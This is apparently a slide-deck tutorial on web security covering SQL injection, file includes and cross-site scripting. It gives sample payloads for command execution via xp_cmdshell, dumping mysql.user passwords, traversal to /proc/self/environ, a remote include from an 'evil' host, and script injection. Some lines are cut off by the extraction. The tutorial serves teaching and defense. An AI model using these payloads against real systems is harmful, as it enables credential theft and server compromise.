In part 14 of Web Application Security 101 you will learn about SQL Injection, Cross-site Scripting, Local File Includes and other common types of data validation problems.
3. SQL Injection
SQL Injection is an attack where a partial or a complete SQL query is
inserted/injected into another query run by the targeted application.
5. SQL Backends
There are multiple SQL backends that have various features.
Common Backends
MsSQL (Transact-SQL)
MySQL
PostgreSQL
Oracle (PL/SQL)
Many More
7. In Detail
Assuming that $valueis a variable controlled by the user:
$query = "SELECT * FROM table WHERE column = '" + $value + "'";
When $valueequals to ' OR '1'='1then:
SELECT * FROM table WHERE column = '' OR '1'='1'
8. SQL Injection Techniques
Union Selection - to obtain values from other tables.
SELECT * FROM table WHERE column = '' UNION SELECT 'a','b','c','d','e'
Boolean Selection - to create universally true or false statements.
SELECT * FROM table WHERE column = '' OR '1'='1'
Time Selection - to measure injection by timing the execution.
SELECT * FROM table WHERE column = '' OR IF(1=1, sleep(10), 'false'))--'
9. MsSQL Injection Techniques
Table enumeration - find the table structure.
SELECT * FROM table WHERE column = '' HAVING 1=1--'
SELECT * FROM table WHERE column = '' GROUP BY column1,columnN HAVING 1=1--
Code execution - running arbitrary commands.
SELECT * FROM table WHERE column = ''; exec master.dbo.xp_cmdshell 'comman
Query delay - timing delay after query.
SELECT * FROM table WHERE column = ''; WAITFOR DELAY '0:0:30'
10. MySQL Injection Techniques Pt. 1
Finding information - retrieving various server variables and functions.
SELECT * FROM table WHERE column = '' AND 1=0 UNION SELECT @@version, 'b',
User enumeration - retrieving MySQL server users and passwords.
SELECT * FROM table WHERE column = '' UNION SELECT * FROM mysql.user#'
11. MySQL Injection Techniques Pt. 2
Table enumeration - retrieving MySQL server tables.
SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.tables#
Column enumeration - retrieving MySQL server columns.
SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.columns
13. SQL Injection Is Art
There are many different types of tools and techniques with various
level of complexity used to exploit SQL Injection vulnerabilities.
14. File Includes
This attack vector is used to perform arbitrary file/url read or
execution using low-level functions and application-specific features.
17. In Detail
Assuming that $valueis a variable controlled by the user:
<?php fetchfile("./path/to/file/" . $value) ?>
When $valueequals to ../../../index.phpthen:
<?php fetchfile("./path/to/file/../../../index.php") ?>
18. File Include Techniques Pt. 1
Usage of ../to traverse directory structure.
<?php fetchfile("./path/to/file/../../../index.php") ?>
Usage of null (0x00) to terminate strings for low level C functions.
<?php fetchfile("./path/to/file/../../../index.php0.txt") ?>
19. File Include Techniques Pt. 2
Usage of overlong dot (0xc0, 0xae) to by pass escape functions.
<?php fetchfile("./path/to/file/xc0xae./../../index.php0.txt") ?>
Usage of system resources to cause other behaviour.
<?php fetchfile("./path/to/file/../../../../../proc/self/environ") ?>
20. Remote File Includes
This type of problem occurs when injecting a remote file controlled
by the attacker. In this case, the attacker has a greater control over
the exploitation process if something special is done to the file.
<?php fetchfile("http://evil/path/to/file") ?>
22. Cross-site Scripting
Is a type of vulnerability where an attacker can bypass SOP (Same
Origin Policy) through client-side injection or by abusing forms of
configuration.
23. Types Of XSS
Reflected - when the injection is immediately returned.
Stored - when the injection is stored.
DOM-based - when the injection occurs due to JS.
Others - the are many other uncategorized varients.
25. In Detail
Assuming that $valueis a variable controlled by the user:
<?php ?><span><?php echo $value ?></span>
When $valueequals to <script>alert(1)</script>then:
<span><script>alert(1)</script></span>
26. XSS Techniques Pt. 1
When script tags are sanitized or escaped.
<span><img src=a onerror=alert(1)></span>
When the injection occurs inside an event attribute.
<button onclick="alert(1)"></button>
27. XSS Techniques Pt. 2
When the injection occurs inside JavaScript a tag.
<script>var a = ""; alert(1); "";</script>
When the injection occurs in multiple small places.
<span><script>alert(1)/* is something like */</script></span>
28. Stored XSS
The injection is temporarily or permanently stored.
<?php $_SESSION['name'] = $_GET['name'] ?>
Later on there is this code that causes for the XSS to occur:
<?php ?><span><?php echo $_SESSION['name'] ?></span>
29. DOM-based XSS
The injection may occur at any point but triggered via JavaScript.
<script>
var match = document.location.search.match(/[?&]name=(w+)/);
if (match) {
document.write("Hello " + match[1]);
}
</script>
There are many different ways an injection can occur.
30. Other Forms Of XSS
The presence of crossdomain.xmlmay open the app to XSS.
<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>